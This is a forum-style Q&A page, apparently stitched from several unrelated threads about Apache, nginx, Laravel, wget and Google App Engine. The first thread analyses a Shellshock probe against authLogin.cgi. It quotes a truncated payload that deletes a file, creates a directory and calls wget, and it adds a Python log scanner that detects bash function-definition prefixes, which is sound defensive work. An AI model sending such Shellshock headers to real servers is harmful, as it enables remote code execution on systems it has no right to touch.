Apache http server has stopped working - php

Hi Friends,
I am using the Ampps server with PHP 5.3.29 on Windows Server Datacenter.
Unfortunately, I am getting the following prompt on Windows Server and my site is down.
Prompt title:
Microsoft Windows
Prompt message:
Apache HTTP Server has stopped working.
A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
Trace:
When tracing the error and access logs, I found the following log entries as the cause.
In Apache access log:
202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
In Apache error log:
[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
Please help me.

There is a Web bot trying to get authority so it can wget and execute something like S0.py, which I imagine is a worm so the download server is compromised.
I'd like a copy of S0.sh; if you happen to get one, give it to exploit-db or something like it.
The clever command is:
Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
The file is executed following download.
I suppose there's something about HDB_DATA, which I don't even have.
"Information is Paramount!"

If you try to open this file, what happens?
D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
The message indicates that the file does not exist, as indicated by the 404 error and the message "script not found".

Finally, I denied those clients access to the cgi-bin directory.
In the cgi-bin directory I created a .htaccess file.
I added the following line to .htaccess:
Deny from all

I don't think authLogin.cgi really matters other than it might allow someone to execute. The problem is that the user tries to remove, or successfully removes, /tmp/S0.sh, makes a directory php in the share folder, and then executes wget.
/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
Here is what came up after all that time of wondering:
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
"S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands."
So it was a real treat catching this action and initially no one knew to call it Shellshock. There is a copy of S0.sh there and you can see it's a worm, which I presumed was the case.
From what I read the worm is just browsing the IP space looking for anyone listening to port 8080.
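Added example, not part of the original posts: the access-log entries in the question are in Common Log Format, which does not record the User-Agent header where the `() { :; };` string was sent. Assuming Combined Log Format is enabled, this Python scanner flags requests for the probed path and any logged field containing a bash function-definition prefix. The names `classify`, `scan` and `SAMPLE` are hypothetical, and the sample lines are constructed.

```python
import re
from collections import Counter

# Combined Log Format; the trailing "referer" "user-agent" pair is optional so
# Common Log Format lines (the shape of the entries posted above) also parse.
QUOTED = r'"((?:[^"\\]|\\.)*)"'   # Apache logs an embedded quote as \"
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+'
    r'(?: ' + QUOTED + ' ' + QUOTED + r')?\s*$'
)
# "() {" is the bash function-definition prefix that Shellshock payloads start with.
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')
PROBED_PATH = "/cgi-bin/authLogin.cgi"   # path requested in the thread's logs


def classify(line):
    """Return a finding dict for a suspicious log line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    host, request, status, referer, agent = m.groups()
    parts = request.split()
    path = parts[1].split("?", 1)[0] if len(parts) >= 2 else ""
    reasons = ["probe-path"] if path == PROBED_PATH else []
    for name, value in (("request", request), ("referer", referer), ("agent", agent)):
        if value and FUNC_DEF_RE.search(value):
            reasons.append("funcdef-in-" + name)
    if not reasons:
        return None
    # A 2xx/3xx answer means something handled the request: triage those first.
    return {"host": host, "status": int(status), "reasons": reasons,
            "handled": int(status) < 400}


def scan(lines):
    """Classify every line; return (findings, hits per client address)."""
    findings = [f for f in map(classify, lines) if f]
    return findings, Counter(f["host"] for f in findings)


# Constructed sample lines (documentation IP ranges, harmless echo payloads).
SAMPLE = [
    '192.0.2.10 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335',
    '192.0.2.11 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335 "-" "() { :; }; echo constructed-sample"',
    '198.51.100.7 - - [10/Dec/2014:06:12:00 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Dec/2014:06:13:02 -0500] "GET /index.php HTTP/1.1" 200 5120 "() { :; }; echo constructed-sample" "Mozilla/5.0"',
]

if __name__ == "__main__":
    findings, per_host = scan(SAMPLE)
    for f in findings:
        print(f)
    print(per_host.most_common())
```

A 404 on the probed path, as in the question's logs, means no CGI script received the request; a finding with `handled` set to true is the one to investigate first.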

Related

Can't find a docker php/nginx error log matching error 500

I have a php docker app running with multiple containers such as
j_php-fpm_1 and j_nginx_1
j_php-fpm_1 is the container with the whole project (Magento / php but that's not relevant here).
My issue is the following:
At some point in the app I trigger "A technical problem with the server created an error. Try again to continue what you were doing. If the problem persists, try again later.", which means I have a server error within my PHP even before entering the framework.
So I have been into my j_php-fpm_1, but the file can't be read due to permission denied:
make bash
docker-compose exec -u magento php-fpm bash
magento#315933593d37:/var/www/magento$ ls -al /var/log/php7.3-fpm.log
-rw------- 1 root root 0 Jan 3 10:04 /var/log/php7.3-fpm.log
magento#315933593d37:/var/www/magento$
cat: /var/log/php7.3-fpm.log: Permission denied
Then I tried to check the live nginx logs
docker logs j_nginx_1
As a result I see my request triggering the error, but still no errors printed in the log
172.21.0.1 - - [05/Jan/2022:15:22:34 +0000] "POST /admin_sdj/sponsorship/index/sponsorship/key/d81ba9d66a439a3fe7a2e70e9567830be8b3a1cef39f8984002129045622fb59/id/1/?isAjax=true HTTP/1.1" 200 190 "http://j.dev-cpy.fr/admin_sdj/customer/index/edit/id/1/key/05dae1e3543127f8c02295e29b06b70722d085f69a37b0d7155fc257ce6b1257/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
The access log and error log from the nginx container are empty.
Any ideas where I can find my error log?
PS: I can't change the php-fpm log file rights.
EDIT: Connecting as root with docker exec -it --user root j_php-fpm_1 /bin/bash shows the fpm log file is empty too.
I don't know where to look anymore.
I found my error's origin; it was actually due to a wrong URL path triggering a 404 error, which was then triggering the server error in some following request. Still no idea about the logs though, but at least my issue is solved right now. I'll leave the topic open in case someone has an idea.

Sometimes error appears net::ERR_INCOMPLETE_CHUNKED_ENCODING [duplicate]

This only happens on Google Chrome and Chromium with a fresh install of Laravel.
The page shows blank and in the console it says:
(failed) net::ERR_INCOMPLETE_CHUNKED_ENCODING
instead of the default hello view, which says “You have arrived.”
My server is Debian Wheezy with ISPConfig, Apache 2.2 and PHP 5.4.
Does anybody know how I can fix this?
Had the same problem on an Ubuntu 14.04 Vagrant box running nginx. The site is a Laravel 5 one that one day surprisingly started throwing those errors.
After reading this comment:
https://github.com/barryvdh/laravel-debugbar/issues/262#issuecomment-74385850
I've checked my /var/log/nginx/vagrant.com-error.log.1 and saw:
[crit] 1020#0: *774 open() "/var/lib/nginx/fastcgi/3/03/0000000033" failed (13: Permission denied) while reading upstream, client: 192.168.56.1, server: 192.168.56.102.xip.io, request: "GET /_debugbar/assets/javascript?1423122680 HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "my-host", referrer: "http://url/that/fails"
Double-checked my Vagrant box nginx lib directory permissions ll /var/lib/
drwxr-xr-x 7 root root 4096 feb 9 11:28 nginx/
... where internally was using www-data user: ll /var/lib/nginx/
drwx------ 12 www-data root 4096 may 5 13:32 fastcgi/
So I ran:
chown -R www-data:www-data /var/lib/nginx
And the error in Chrome disappeared.
Just posting here to note the solution, even though all the credit should go to the linked original comment.
I had the exact same problem that you have. I found a work-around over here on this forum thread:
http://laravel.io/forum/02-08-2014-another-problem-only-with-chrome
The code used by the person who provided the workaround: http://laravel.io/bin/eyyDj#4,7
The gist of it is to just up and tell Chrome how much data to expect for every request, so it doesn't have to chunk the data.
I'm seeing reports that upgrading to PHP 5.5 also fixes this problem, but not all of us can have that kind of control over our servers.
Edit: It looks as if blindly applying this work-around causes errors on redirects. This is the code that I'm now using:
App::after(function($request, $response) {
    // Fixes a strange issue with Chrome. Should theoretically be removeable
    // after upgrading PHP to 5.5 from 5.4
    if ($response instanceof Illuminate\Http\Response) {
        $response->header('Content-Length', strlen($response->getOriginalContent()));
    }
});
Note that JSON responses are a separate type and may still have the chunking issue, so this solution may need to evolve somewhat to accommodate that.

wget fails on a local domain

I have a Red Hat linux box with apache running several domains, including a.com and b.com.
I have a php script a.com/wget.php, which makes an exec() call to download a file on the local domain b.com. Running the php script from the command line is successful.
But running this script from a web page results in a 404 error. The command is:
/usr/bin/wget -k -S --save-headers --keep-session-cookies
-O <local-file-name> -o <local-log-file-name> -U \"Mozilla/5.0
(Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101
Firefox/24.0\" --max-redirect=100 "http://b.com/page.php"
No log messages are written to the Apache access log file for domain b.com for this call.
BUT the server access log file (/var/log/httpd/access_log) is NOT empty, it shows that there was an attempt made to open page "/page.php" on the server (the link in access log has no domain).
xx.xx.xx.xx - - [19/May/2014:12:02:49 +0100] "GET /page.php
HTTP/1.0" 404 285 "-" "Mozilla/5.0 (Macintosh;
Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0"
Server error log (/var/log/httpd/error_log) gives this error:
[Mon May 19 12:02:49 2014] [error] [client xx.xx.xx.xx]
File does not exist: /var/www/vhosts/default/htdocs
So it would seem that something is stripping the domain name from "http://b.com/page.php" and the resulting URL that wget is trying to connect to is "/page.php". This will not work, given that the server has many domains on it.
Has anyone come across this? Is there some setting in wget or php or apache that would cause this to not happen? I tried different things based on suggestions regarding similar problems, but nothing has worked so far.
Thanks.
The problem turned out to be not in wget, but in firewall settings. The wget call, executed from behind the firewall, was resolving the domain to an external IP address, and connections to the external IP address were failing. Correcting this in the firewall fixed the wget problem.

Starting Google App Engine Web Server

I'm going through the helloworld tutorial for Google App Engine using PHP (https://developers.google.com/appengine/docs/php/gettingstarted/helloworld). After getting the application set up and ready to go the tutorial tells me to start the web server included with the Google App Engine SDK using the command: google_appengine/dev_appserver.py --php_executable_path= helloworld/. How exactly do I start the web server and where do I put that command in?
After you install the SDK on your machine you'll have a google_appengine directory. I run Windows so mine is located at:
C:\Program Files (x86)\Google\google_appengine
Inside that directory is a python script called "dev_appserver.py" which is what the tutorial wants you to run. Your local machine should also have PHP installed and the script is looking for the location to that since it would be something you'd install yourself.
You'll execute this script from whatever local command line application your OS has (shell for Linux, terminal in Mac, Command Prompt or Powershell in Windows).
I execute mine from the folder one level above where my GAE application is stored. To ensure you can properly execute this command, run it with no parameters and you should see this:
python "C:\Program Files (x86)\Google\google_appengine\dev_appserver.py"
Output:
usage: dev_appserver.py [-h] [--host HOST] [--port PORT]
[--admin_host ADMIN_HOST] [--admin_port ADMIN_PORT]
[--auth_domain AUTH_DOMAIN] [--storage_path PATH]
[--log_level {debug,info,warning,critical,error}]
[--max_module_instances MAX_MODULE_INSTANCES]
[--use_mtime_file_watcher [USE_MTIME_FILE_WATCHER]]
[--threadsafe_override THREADSAFE_OVERRIDE]
[--php_executable_path PATH]
[--php_remote_debugging [PHP_REMOTE_DEBUGGING]]
[--python_startup_script PYTHON_STARTUP_SCRIPT]
[--python_startup_args PYTHON_STARTUP_ARGS]
[--blobstore_path BLOBSTORE_PATH]
[--mysql_host MYSQL_HOST] [--mysql_port MYSQL_PORT]
[--mysql_user MYSQL_USER]
[--mysql_password MYSQL_PASSWORD]
[--mysql_socket MYSQL_SOCKET]
[--datastore_path DATASTORE_PATH]
[--clear_datastore [CLEAR_DATASTORE]]
[--datastore_consistency_policy {consistent,random,time}]
[--require_indexes [REQUIRE_INDEXES]]
[--auto_id_policy {sequential,scattered}]
[--logs_path LOGS_PATH]
[--show_mail_body [SHOW_MAIL_BODY]]
[--enable_sendmail [ENABLE_SENDMAIL]]
[--smtp_host SMTP_HOST] [--smtp_port SMTP_PORT]
[--smtp_user SMTP_USER]
[--smtp_password SMTP_PASSWORD]
[--prospective_search_path PROSPECTIVE_SEARCH_PATH]
[--clear_prospective_search [CLEAR_PROSPECTIVE_SEARCH]]
[--search_indexes_path SEARCH_INDEXES_PATH]
[--clear_search_indexes [CLEAR_SEARCH_INDEXES]]
[--enable_task_running [ENABLE_TASK_RUNNING]]
[--allow_skipped_files [ALLOW_SKIPPED_FILES]]
[--api_port API_PORT]
[--automatic_restart [AUTOMATIC_RESTART]]
[--dev_appserver_log_level {debug,info,warning,critical,error}]
[--skip_sdk_update_check [SKIP_SDK_UPDATE_CHECK]]
[--default_gcs_bucket_name DEFAULT_GCS_BUCKET_NAME]
yaml_files [yaml_files ...]
dev_appserver.py: error: too few arguments
My command to get this working properly was:
python "C:\Program Files (x86)\Google\google_appengine\dev_appserver.py" --port 8082 --admin_port 8083 --php_executable_path "C:\Program Files (x86)\NuSphere\PhpED\php54\php-cgi.exe" helloworld\
I got this output in PowerShell and was able to hit the local URL and see "Hello, World!"
INFO 2013-10-22 16:04:27,039 sdk_update_checker.py:245] Checking for updates to the SDK.
INFO 2013-10-22 16:04:28,368 sdk_update_checker.py:261] Update check failed: HTTP Error 404: Not Found
WARNING 2013-10-22 16:04:28,398 api_server.py:332] Could not initialize images API; you are likely missing the Python "PIL" module.
INFO 2013-10-22 16:04:28,405 api_server.py:139] Starting API server at: http://localhost:52150
INFO 2013-10-22 16:04:28,408 dispatcher.py:171] Starting module "default" running at: http://localhost:8082
INFO 2013-10-22 16:04:28,411 admin_server.py:117] Starting admin server at: http://localhost:8083
INFO 2013-10-22 16:04:31,980 module.py:608] default: "GET / HTTP/1.1" 200 13
INFO 2013-10-22 16:04:32,223 module.py:608] default: "GET /favicon.ico HTTP/1.1" 200 13
The Google cloud SDK comes with a Launcher in which you could add project files and examine the logs in the GUI. I used python code here but it should behave the same with php.
Go to Google App Engine Launcher -> Select File -> Add Existing Application -> Browse and select the root directory of your PHP/Python/Java/Go application -> Add -> Click Run button -> Click Logs
2014-12-30 01:02:57 Running command: "['C:\\Users\\gung13\\Anaconda\\pythonw.exe', 'C:\\Program Files\\Google\\Cloud SDK\\google-cloud-sdk\\platform\\google_appengine\\dev_appserver.py', '--skip_sdk_update_check=yes', '--port=9080', '--admin_port=8001', u'C:\\Users\\gung13\\Desktop\\appengine-try-python-flask']"
INFO 2014-12-30 01:02:57,874 devappserver2.py:745] Skipping SDK update check.
INFO 2014-12-30 01:02:57,903 api_server.py:172] Starting API server at: http://localhost:62234
INFO 2014-12-30 01:02:57,905 dispatcher.py:186] Starting module "default" running at: http://localhost:9080
INFO 2014-12-30 01:02:57,907 admin_server.py:118] Starting admin server at: http://localhost:8001
INFO 2014-12-30 01:03:21,677 module.py:718] default: "GET / HTTP/1.1" 200 13
INFO 2014-12-30 01:03:21,986 module.py:718] default: "GET /favicon.ico HTTP/1.1" 404 27
